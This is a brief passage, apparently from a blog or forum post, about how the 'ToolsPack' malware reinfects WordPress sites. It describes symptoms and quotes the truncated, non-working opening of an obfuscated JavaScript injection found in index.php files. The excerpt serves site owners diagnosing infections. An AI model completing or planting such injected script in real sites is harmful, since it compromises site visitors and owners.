How do WordPress sites get ToolsPack malware?

ToolsPack plugin is bad stuff…   Symptoms: Your index.php file(s) get JavaScript with something like this at the top: <script>if(window.document)aa=new RegExp(‘test’,’i’).toString();aaa=’/… Then, after cleaning, it returns. Plus you get BlackListed by Google. How does your index.php file get overwritten? Then,

